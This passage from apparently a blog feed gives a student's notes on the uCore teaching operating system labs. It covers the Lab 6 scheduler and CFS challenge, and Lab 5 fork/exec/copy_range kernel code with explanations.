class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">stride_proc_tick</span><span class="params">(<span class="keyword">struct</span> run_queue *rq, <span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;time_slice --;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> (proc-&gt;time_slice == <span class="number">0</span>) &#123;</span><br><span class="line">        proc-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="3-扩展练习">3) Extended Exercises</h3><h4 id="1-Challenge-1">1. Challenge 1</h4><blockquote><p>Implement the Linux CFS algorithm</p></blockquote><p>The main idea behind CFS (the Completely Fair Scheduler) is to keep the processor time given to tasks balanced (fair). It gives every process a virtual clock, vruntime, where $vruntime = \text{actual runtime} * 1024 / \text{process weight}$.</p><p>Within each physical clock tick, processes advance at their own different rates. A higher priority means a larger weight, so the virtual clock of that process runs slower than the real clock and the process ends up with more running time. The CFS scheduler always picks the process whose virtual clock is furthest behind (the smallest vruntime), so the virtual runtimes of the scheduling entities keep chasing one another, which balances scheduling across processes.</p><p>CFS uses a <strong>red-black tree</strong> to insert and remove processes quickly and efficiently.</p><blockquote><p>The implementation is similar to Stride Scheduling, with only slight differences. (Left for later~)</p></blockquote><p>References:</p><ul><li><p><a href="https://www.cnblogs.com/tianguiyu/articles/6091378.html">linux内核分析——CFS（完全公平调度算法）</a></p></li><li><p><a href="https://www.cnblogs.com/XiaoliBoy/p/10410686.html">Linux内核CFS调度器</a></p></li></ul><h4 id="2-Challenge-2">2. 
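Challenge 2</h4><blockquote><p>Implement as many basic scheduling algorithms as possible on ucore (FIFO, SJF, …), and design test cases that quantify how the algorithms differ across various metrics and show where each algorithm is applicable.</p></blockquote><blockquote><p>I will pass on this one~</p></blockquote>]]></content>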
    
    
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;These are the notes I wrote while working through &lt;code&gt;uCore&lt;/code&gt; Lab 6.&lt;/li&gt;
&lt;li&gt;They cover the implementation of processor scheduling.&lt;/li&gt;
&lt;/ul&gt;</summary>
    
    
    
    <category term="天问之路" scheme="https://kiprey.github.io/categories/%E5%A4%A9%E9%97%AE%E4%B9%8B%E8%B7%AF/"/>
    
    
    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>uCore Labs - Lab5</title>
    <link href="https://kiprey.github.io/2020/08/uCore-5/"/>
    <id>https://kiprey.github.io/2020/08/uCore-5/</id>
    <published>2020-08-21T09:35:38.000Z</published>
    <updated>2025-11-24T03:59:40.153Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">Introduction</h2><ul><li>These are the notes I wrote while working through <code>uCore</code> Lab 5.</li><li>They cover the concrete implementation of the <code>fork/exec/wait/exit</code> mechanisms.<span id="more"></span></li></ul><h2 id="练习解答">Exercise Solutions</h2><h3 id="0-练习0">0) Exercise 0</h3><p>Besides filling the lab 1/2/3/4 code into lab5, a few other places need to be completed:</p><ul><li><p>In the <code>alloc_proc</code> function, initialize the <code>proc_struct::wait_state</code> and <code>proc_struct::cptr/optr/yptr</code> members.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *</span><br><span class="line"><span class="built_in">alloc_proc</span>(<span class="type">void</span>) &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">proc_struct</span> *proc = <span class="built_in">kmalloc</span>(<span class="built_in">sizeof</span>(<span class="keyword">struct</span> proc_struct));</span><br><span class="line">    <span class="keyword">if</span> (proc != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="comment">// .....</span></span><br><span class="line">        <span class="comment">// Lab5 code</span></span><br><span class="line">        proc-&gt;wait_state = <span class="number">0</span>;</span><br><span class="line">        proc-&gt;cptr = proc-&gt;optr = proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> proc;</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In the <code>idt_init</code> function, set the privilege level required to trigger the <code>T_SYSCALL</code> interrupt to <code>DPL_USER</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">idt_init</span><span class="params">(<span class="type">void</span>)</span> </span>&#123;</span><br><span class="line">     <span class="comment">// ......</span></span><br><span class="line">    <span class="comment">// Lab5 code</span></span><br><span class="line">    <span class="built_in">SETGATE</span>(idt[T_SYSCALL], <span class="number">1</span>, GD_KTEXT, __vectors[T_SYSCALL], DPL_USER);</span><br><span class="line">    <span class="comment">// ......</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>In <code>trap_dispatch</code>, mark the currently running process as ready to be rescheduled after every 100 timer interrupts, and comment out the original &quot;100ticks&quot; output.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span 
class="title">trap_dispatch</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="type">char</span> c;</span><br><span class="line">    <span class="type">int</span> ret=<span class="number">0</span>;</span><br><span class="line">    <span class="keyword">switch</span> (tf-&gt;tf_trapno) &#123;</span><br><span class="line">    <span class="comment">// ......</span></span><br><span class="line">    <span class="keyword">case</span> IRQ_OFFSET + IRQ_TIMER:</span><br><span class="line">        ticks++;</span><br><span class="line">        <span class="keyword">if</span>(ticks % TICK_NUM == <span class="number">0</span>)&#123;</span><br><span class="line">            <span class="comment">// Lab5 Code</span></span><br><span class="line">            <span class="built_in">assert</span>(current != <span class="literal">NULL</span>);</span><br><span class="line">            current-&gt;need_resched = <span class="number">1</span>;</span><br><span class="line">            <span class="comment">//print_ticks();</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">   <span class="comment">// ......</span></span><br></pre></td></tr></table></figure></li><li><p>In the <code>do_fork</code> function, add a check of the current process's wait state, and use the <code>set_links</code> function to set up the relations between processes.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">do_fork</span><span class="params">(<span class="type">uint32_t</span> clone_flags, <span class="type">uintptr_t</span> stack, <span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ..........</span></span><br><span class="line">    <span class="keyword">if</span> ((proc = <span class="built_in">alloc_proc</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="keyword">goto</span> fork_out;</span><br><span class="line">    proc-&gt;parent = current;</span><br><span class="line">    <span class="comment">// Lab5: make sure the current process's wait state is clear</span></span><br><span class="line">    <span class="built_in">assert</span>(current-&gt;wait_state == <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">setup_kstack</span>(proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_proc;</span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">copy_mm</span>(clone_flags, proc) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> bad_fork_cleanup_kstack;</span><br><span class="line">    <span class="built_in">copy_thread</span>(proc, stack, tf);</span><br><span class="line">    <span class="type">bool</span> intr_flag;</span><br><span 
class="line">    <span class="built_in">local_intr_save</span>(intr_flag);</span><br><span class="line">    &#123;</span><br><span class="line">        proc-&gt;pid = <span class="built_in">get_pid</span>();</span><br><span class="line">        <span class="built_in">hash_proc</span>(proc);</span><br><span class="line">        <span class="comment">// Lab5: set up the relations between processes</span></span><br><span class="line">        <span class="built_in">set_links</span>(proc);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">local_intr_restore</span>(intr_flag);</span><br><span class="line">    <span class="built_in">wakeup_proc</span>(proc);</span><br><span class="line">    ret = proc-&gt;pid;</span><br><span class="line">    <span class="comment">// ..........</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h3 id="1-练习1">1) Exercise 1</h3><blockquote><p><strong>Load and run an application</strong></p><p>The <strong>do_execv</strong> function calls load_icode (in kern/process/proc.c) to load and parse an application in ELF executable format that already resides in memory, sets up the user memory space that holds the application's code segment, data segment and so on, and must fill in the trapframe member of the proc_struct structure so that, once this process runs, execution starts from the entry address specified by the application. The trapframe contents must be set correctly.</p></blockquote><ul><li><p>The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// codes in 
`load_icode` function</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//(6) setup trapframe for user environment</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">trapframe</span> *tf = current-&gt;tf;</span><br><span class="line"><span class="built_in">memset</span>(tf, <span class="number">0</span>, <span class="built_in">sizeof</span>(<span class="keyword">struct</span> trapframe));</span><br><span class="line"><span class="comment">/* LAB5:EXERCISE1 YOUR CODE</span></span><br><span class="line"><span class="comment"> * should set tf_cs,tf_ds,tf_es,tf_ss,tf_esp,tf_eip,tf_eflags</span></span><br><span class="line"><span class="comment"> * NOTICE: If we set trapframe correctly, then the user level process can return to USER MODE from kernel. So</span></span><br><span class="line"><span class="comment"> *          tf_cs should be USER_CS segment (see memlayout.h)</span></span><br><span class="line"><span class="comment"> *          tf_ds=tf_es=tf_ss should be USER_DS segment</span></span><br><span class="line"><span class="comment"> *          tf_esp should be the top addr of user stack (USTACKTOP)</span></span><br><span class="line"><span class="comment"> *          tf_eip should be the entry point of this binary program (elf-&gt;e_entry)</span></span><br><span class="line"><span class="comment"> *          tf_eflags should be set to enable computer to produce Interrupt</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">tf-&gt;tf_cs = USER_CS;</span><br><span class="line">tf-&gt;tf_ds = tf-&gt;tf_es = tf-&gt;tf_ss = USER_DS;</span><br><span class="line">tf-&gt;tf_esp = USTACKTOP;</span><br><span class="line">tf-&gt;tf_eip = elf-&gt;e_entry;</span><br><span class="line">tf-&gt;tf_eflags = FL_IF;</span><br><span class="line">ret = <span 
class="number">0</span>;</span><br></pre></td></tr></table></figure></li><li><p>Describe how, after a user-mode process has been created and an application loaded, the CPU finally gets the application running in user mode; that is, the whole path from the moment ucore selects this user-mode process to occupy the CPU (RUNNING state) to the execution of the application's first instruction.</p><blockquote><p>To keep the description manageable, I will walk through what happens from the moment a user-mode program begins executing <code>sys_execve</code> until the first instruction of the newly loaded application runs.</p></blockquote><ul><li><p>When a user-mode program executes <code>sys_execve</code>, it triggers interrupt <code>0x80</code> and enters the interrupt handler. As in Lab1, the handler's entry code saves a <code>trapframe</code> as the context used to return to user mode. Unlike the lab1 code, however, the <code>trap</code> function in lab5 is implemented as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">trap</span><span class="params">(<span class="keyword">struct</span> trapframe *tf)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// dispatch based on what type of trap occurred</span></span><br><span class="line">    <span class="comment">// used for previous projects</span></span><br><span class="line">    <span class="keyword">if</span> (current == <span class="literal">NULL</span>)</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span 
class="comment">// Nested interrupts are possible, so save the previous trapframe</span></span><br><span class="line">        <span class="keyword">struct</span> trapframe *otf = current-&gt;tf;</span><br><span class="line">        <span class="comment">// Note this step: point the current process's trapframe at the frame of the current interrupt</span></span><br><span class="line">        current-&gt;tf = tf;</span><br><span class="line">        <span class="type">bool</span> in_kernel = <span class="built_in">trap_in_kernel</span>(tf);</span><br><span class="line">        <span class="built_in">trap_dispatch</span>(tf);</span><br><span class="line">        current-&gt;tf = otf;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (!in_kernel) &#123;</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;flags &amp; PF_EXITING)</span><br><span class="line">                <span class="built_in">do_exit</span>(-E_KILLED);</span><br><span class="line">            <span class="keyword">if</span> (current-&gt;need_resched)</span><br><span class="line">                <span class="built_in">schedule</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>Because of how <code>trap</code> is designed, inside <code>do_execve</code> <code>current-&gt;tf</code> holds the user-mode context.</p></li><li><p>So when <code>load_icode</code> runs, it only needs to modify the trapframe that <code>current-&gt;tf</code> points to, because that trapframe is the context the CPU loads when the interrupt handler returns.</p></li></ul></li></ul><h3 id="2-练习2">2) Exercise 2</h3><blockquote><p><strong>The parent process copies its memory space to the child process</strong></p><p>While executing, do_fork, the function that creates a child process, copies the valid contents of the current (parent) process's user memory address space into the new (child) process, completing the duplication of memory resources. This is done by the copy_range function; complete the implementation of copy_range and make sure it runs correctly.</p></blockquote><p>The implementation is below; details are given as comments in the code:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* copy_range - copy content of memory (start, end) of one process A to another process B</span></span><br><span class="line"><span class="comment"> * @to:    the addr of process B&#x27;s Page Directory</span></span><br><span class="line"><span class="comment"> * @from:  the addr of process A&#x27;s Page Directory</span></span><br><span class="line"><span class="comment"> * @share: flags to indicate to dup OR share. 
We just use dup method, so it didn&#x27;t be used.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * CALL GRAPH: copy_mm--&gt;dup_mmap--&gt;copy_range</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span class="function"><span class="title">copy_range</span><span class="params">(<span class="type">pde_t</span> *to, <span class="type">pde_t</span> *from, <span class="type">uintptr_t</span> start, <span class="type">uintptr_t</span> end, <span class="type">bool</span> share)</span> </span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(start % PGSIZE == <span class="number">0</span> &amp;&amp; end % PGSIZE == <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">USER_ACCESS</span>(start, end));</span><br><span class="line">    <span class="comment">// copy content by page unit.</span></span><br><span class="line">    <span class="keyword">do</span> &#123;</span><br><span class="line">        <span class="comment">//call get_pte to find process A&#x27;s pte according to the addr start</span></span><br><span class="line">        <span class="type">pte_t</span> *ptep = <span class="built_in">get_pte</span>(from, start, <span class="number">0</span>), *nptep;</span><br><span class="line">        <span class="keyword">if</span> (ptep == <span class="literal">NULL</span>) &#123;</span><br><span class="line">            start = <span class="built_in">ROUNDDOWN</span>(start + PTSIZE, PTSIZE);</span><br><span class="line">            <span class="keyword">continue</span> ;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">//call get_pte to find process B&#x27;s pte according to the addr start. 
If pte is NULL, just alloc a PT</span></span><br><span class="line">        <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">            <span class="keyword">if</span> ((nptep = <span class="built_in">get_pte</span>(to, start, <span class="number">1</span>)) == <span class="literal">NULL</span>) &#123;</span><br><span class="line">                <span class="keyword">return</span> -E_NO_MEM;</span><br><span class="line">            &#125;</span><br><span class="line">        <span class="type">uint32_t</span> perm = (*ptep &amp; PTE_USER);</span><br><span class="line">        <span class="comment">//get page from ptep</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">        <span class="comment">// alloc a page for process B</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *npage=<span class="built_in">alloc_page</span>();</span><br><span class="line">        <span class="built_in">assert</span>(page!=<span class="literal">NULL</span>);</span><br><span class="line">        <span class="built_in">assert</span>(npage!=<span class="literal">NULL</span>);</span><br><span class="line">        <span class="type">int</span> ret=<span class="number">0</span>;</span><br><span class="line">        <span class="comment">/* LAB5:EXERCISE2 YOUR CODE</span></span><br><span class="line"><span class="comment">         * replicate content of page to npage, build the map of phy addr of npage with the linear addr start</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="comment">// Get the virtual address of the source page (note: the PDT in use here is the kernel's page directory table)</span></span><br><span class="line">        <span class="type">void</span> * kva_src = <span 
class="built_in">page2kva</span>(page);</span><br><span class="line">        <span class="comment">// Get the virtual address of the destination page</span></span><br><span class="line">        <span class="type">void</span> * kva_dst = <span class="built_in">page2kva</span>(npage);</span><br><span class="line">        <span class="comment">// Copy the page contents</span></span><br><span class="line">        <span class="built_in">memcpy</span>(kva_dst, kva_src, PGSIZE);</span><br><span class="line">        <span class="comment">// Install the new page in the corresponding PTE</span></span><br><span class="line">        ret = <span class="built_in">page_insert</span>(to, npage, start, perm);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">assert</span>(ret == <span class="number">0</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        start += PGSIZE;</span><br><span class="line">    &#125; <span class="keyword">while</span> (start != <span class="number">0</span> &amp;&amp; start &lt; end);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>Briefly explain how to design and implement the "Copy on Write" mechanism; give an outline design, and a detailed design is encouraged.</p><blockquote><p>See the <strong>Extended Exercises</strong> section.</p></blockquote></li></ul><h3 id="3-练习3">3) Exercise 3</h3><blockquote><p><strong>Read and analyze the source code to understand how a process performs fork/exec/wait/exit, and how system calls are implemented</strong></p></blockquote><h4 id="1-do-fork">1. 
do_fork</h4><ul><li><p>The <code>do_fork</code> function in lab5 is similar to the lab4 implementation. The difference is that lab5 uses <code>set_links(proc)</code> to set up the relations between processes, instead of a plain <code>list_add</code> and <code>nr_process++</code>.</p></li><li><p>The <code>set_links</code> function sets up the appropriate relations between the given process and the others. It is implemented as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*************************************************************</span></span><br><span class="line"><span class="comment">process relations</span></span><br><span class="line"><span class="comment">parent:           proc-&gt;parent  (proc is children)</span></span><br><span class="line"><span class="comment">children:         proc-&gt;cptr    (proc is parent)</span></span><br><span class="line"><span class="comment">older sibling:    proc-&gt;optr    (proc is younger sibling)</span></span><br><span class="line"><span class="comment">younger sibling:  proc-&gt;yptr    (proc is older sibling)</span></span><br><span class="line"><span class="comment">*************************************************************/</span></span><br><span class="line"><span class="comment">// set_links - set the relation links of process</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">set_links</span><span class="params">(<span class="keyword">struct</span> proc_struct *proc)</span> </span>&#123;</span><br><span class="line">    <span 
class="built_in">list_add</span>(&amp;proc_list, &amp;(proc-&gt;list_link));</span><br><span class="line">    proc-&gt;yptr = <span class="literal">NULL</span>;</span><br><span class="line">    <span class="keyword">if</span> ((proc-&gt;optr = proc-&gt;parent-&gt;cptr) != <span class="literal">NULL</span>)</span><br><span class="line">        proc-&gt;optr-&gt;yptr = proc;</span><br><span class="line">    proc-&gt;parent-&gt;cptr = proc;</span><br><span class="line">    nr_process ++;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>In addition to the <code>list_add</code> and <code>nr_process++</code> already familiar from lab4, this function also sets the <code>optr</code>, <code>yptr</code>, and <code>cptr</code> members of <code>proc_struct</code>.</p></li><li><p>Here, the <code>cptr</code> pointer points to the <strong>most recently created</strong> child of the current process, i.e. <code>children</code>; <code>yptr</code> points to <strong>the process that shares the same parent as the current process but was created later</strong>, i.e. the <code>younger sibling</code>. The <code>optr</code> pointer is the opposite of <code>yptr</code> and points to the <code>older sibling</code>.</p></li><li><p>The relations between processes are shown in the diagram below:</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">                     +----------------+</span><br><span class="line">                     | parent process |</span><br><span class="line">                     +----------------+</span><br><span class="line">              parent ^         \       ^  parent</span><br><span class="line">                    /           \       \</span><br><span class="line">                   /             \ cptr  \</span><br><span class="line">                  /         yptr  V       \      yptr</span><br><span class="line">           
+-------------+  --&gt;  +-------------+  --&gt;  NULL</span><br><span class="line">           | old process |       | New Process |</span><br><span class="line">NULL  &lt;--  +-------------+  &lt;--  +-------------+</span><br><span class="line">      optr                  optr</span><br></pre></td></tr></table></figure></li></ul></li></ul><h4 id="2-do-execve">2. do_execve</h4><ul><li><p>What the <code>do_execve</code> function does is fairly simple:</p><ul><li>Check that the memory region passed in by the current process (the program name buffer) is valid.</li><li>Reclaim the current process's resources, including its allocated memory space, its page directory table, and so on.</li><li>Read the executable, allocate virtual memory at the locations given by the <code>ELFheader</code>, load the code and data to those addresses, and finally allocate the stack and set up the <code>trapframe</code>.</li><li>Set the new process name.</li></ul></li><li><p>This function <strong>releases almost all of the original process's resources, except the PCB</strong>. In other words, <code>do_execve</code> keeps the original process's PID, its attributes, its relations to other processes, and so on.</p></li><li><p>The function is implemented as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span></span></span><br><span class="line"><span 
class="function"><span class="title">do_execve</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *name, <span class="type">size_t</span> len, <span class="type">unsigned</span> <span class="type">char</span> *binary, <span class="type">size_t</span> size)</span> </span>&#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">mm_struct</span> *mm = current-&gt;mm;</span><br><span class="line">    <span class="keyword">if</span> (!<span class="built_in">user_mem_check</span>(mm, (<span class="type">uintptr_t</span>)name, len, <span class="number">0</span>))</span><br><span class="line">        <span class="keyword">return</span> -E_INVAL;</span><br><span class="line">    <span class="keyword">if</span> (len &gt; PROC_NAME_LEN)</span><br><span class="line">        len = PROC_NAME_LEN;</span><br><span class="line">    <span class="type">char</span> local_name[PROC_NAME_LEN + <span class="number">1</span>];</span><br><span class="line">    <span class="built_in">memset</span>(local_name, <span class="number">0</span>, <span class="built_in">sizeof</span>(local_name));</span><br><span class="line">    <span class="built_in">memcpy</span>(local_name, name, len);</span><br><span class="line">    <span class="comment">// Release the memory</span></span><br><span class="line">    <span class="keyword">if</span> (mm != <span class="literal">NULL</span>) &#123;</span><br><span class="line">        <span class="built_in">lcr3</span>(boot_cr3);</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">mm_count_dec</span>(mm) == <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="built_in">exit_mmap</span>(mm);</span><br><span class="line">            <span class="comment">// Free the PDT that belongs to this mm</span></span><br><span class="line">            <span class="built_in">put_pgdir</span>(mm);</span><br><span class="line">            <span 
class="built_in">mm_destroy</span>(mm);</span><br><span class="line">        &#125;</span><br><span class="line">        current-&gt;mm = <span class="literal">NULL</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 加载可执行文件代码，重设mm_struct，以及重置trapframe</span></span><br><span class="line">    <span class="type">int</span> ret;</span><br><span class="line">    <span class="keyword">if</span> ((ret = <span class="built_in">load_icode</span>(binary, size)) != <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">goto</span> execve_exit;</span><br><span class="line">    <span class="comment">// 设置进程名称</span></span><br><span class="line">    <span class="built_in">set_proc_name</span>(current, local_name);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">execve_exit:</span><br><span class="line">    <span class="built_in">do_exit</span>(ret);</span><br><span class="line">    <span class="built_in">panic</span>(<span class="string">&quot;already exit: %e.\n&quot;</span>, ret);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><h4 id="3-do-wait">3. 
